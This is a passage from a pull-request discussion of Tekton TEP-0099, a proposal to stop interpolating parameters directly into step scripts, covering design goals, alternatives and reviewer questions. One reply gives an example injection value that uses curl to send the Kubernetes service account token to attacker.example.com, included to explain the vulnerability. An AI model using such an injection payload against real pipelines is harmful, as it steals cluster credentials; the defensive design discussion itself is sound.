teps/0099-parameters-in-script.md

```diff
@@ -0,0 +1,475 @@
+   migration.
+1. **Automatable**: A script or program should be able to convert `Tasks`
+   to the new approach. This might be impossible for all cases (e.g. if an
+   unrecognized shebang has been used in the script) but a best-effort
+   implementation should be provided.
+1. **Backwards compatible in v1beta1**. If a user already has `Tasks`
+   that use `$(params.X)` syntax in `script` then we should continue supporting
+   that usage in v1beta1 resources. Ideally, Tekton Pipelines would warn the user
+   about it somehow.
+1. **Backwards incompatible in v1**. Starting with v1, Tekton should strive to
+   be "secure by default" out of the box and so inclusion of param variables
+   in `script` fields should be treated as an error. Newly submitted (or resolved)
+   `Tasks` with this error should fail validation. Existing `Tasks` that include this
+   error should be prevented from executing.
+1. **Provide an escape hatch in v1**. If an operator decides that they want to
+   continue allowing `Parameter` variables to be directly injectable to `script`
+   fields of `Steps` there should be some way for them to configure that.
+
+## Alternatives
+
+### 1. Implicitly Project `Parameters` as Environment Variables in `Steps`
+
+We have projected `Parameters` as environment variables in the `git-clone` Task in the
+Catalog and in our own plumbing repository. We can use this approach, and simplify the
+syntax by implicitly projecting `Parameters` as environment variables in `Steps`.
+The environment variable should be prefixed with `PARAM_` to make it clear and predictable.
+
+```yaml
+  # Before
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar)
+  
+  # After
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo ${PARAM_BAR}
+      
+  # After - Resolved
+  steps:
+  - name: foo
+    image: myimage
+    env:
+    - name: PARAM_BAR
+      value: $(params.bar)
+    script: |
+      echo ${PARAM_BAR}      
+```
+
+##### Discussion
+
+This approach mutates the specification, but it is something we're already doing
+with implicit `Parameters` per [TEP-0023][tep-0023].
+
+### 2. Implicitly Project `Parameters` into the Filesystem of `Steps`
+
+Write `Parameters` in files - `/tekton/parameters/in` - mounted into `Steps`
+in the same way that `Results` are supplied. However, instead of exposing the
+file path, we would hide it behind a variable (possibly reusing `$(params.<name>)`.
+
+
+```yaml
+  # Before
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar)
+  
+  # After
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar)
+```
+
+This approach is also under discussion in the context of changing the way `Result`
+values are stored in [TEP-0086][tep-0086-alt]. In that proposal a sidecar is
+responsible for fetching `Results` from previous `Tasks` and writing them to
+a location on disk for use as `Parameters`.
```

Comment:
Can you elaborate on why this is safer than the current behavior? Are results safe to use in scripts, while params are (currently) not? How are the parameter values in scripts replaced with their values?

Reply:
Params are interpolated directly into the script before it's passed to the container to run. Any value passed to a param is inserted into the script verbatim and executed as if the original script included it - the controller doesn't touch the string content and the container itself doesn't know any different. Plucking out one of the examples from the TEP:

```yaml
  steps:
  - name: foo
    image: myimage
    script: |
      echo $(params.bar)
```

If a TaskRun passes the value like this:

```yaml
params:
- name: bar
  value: $(curl -s http://attacker.example.com/?value=$(cat/var/run/secrets/kubernetes.io/serviceaccount/token))
```

... then the script that the container executes is:

```bash
echo $(curl -s http://attacker.example.com/?value=$(cat/var/run/secrets/kubernetes.io/serviceaccount/token))
```

Reply:
Thanks! What I'm confused about is why writing the value of the parameter to the filesystem prevents this problem. Based on the sample scripts provided, it looks like Tekton is still going to substitute the parameter value into the script. I may be misunderstanding the proposal here, but it sounds like the parameter values are being copied to a different location before being substituted into the script. Why would that prevent injection attacks?

Reply:
Ah I see!  I think the intention here was to inject the path to the file instead of the content of the file itself.

The doc says:

> However, instead of exposing the file path, we would hide it behind a variable (possibly reusing `$(params.<name>)`.

I believe this means that instead of having the user type out the literal path to the param file, we'd use a variable to give them the path instead. So `$(params.foo)` would become `/tekton/params/foo`. Variables are preferable rather than hard-codes paths so that, as much as possible, specific paths don't get forever burned in to an API contract.

So the safety aspect comes from the fact that, in order to inject code, a `script` would first have to explicitly choose to execute a param from a file, rather than having the content of that param in-lined into the `script` field itself.

Reply:
Thanks, this makes a lot more sense! The example might be more clear if the output script is changed to reflect the fact that it's now reading from a file, e.g. `cat $(params.foo)`. This looks like it would be much more challenging to automate.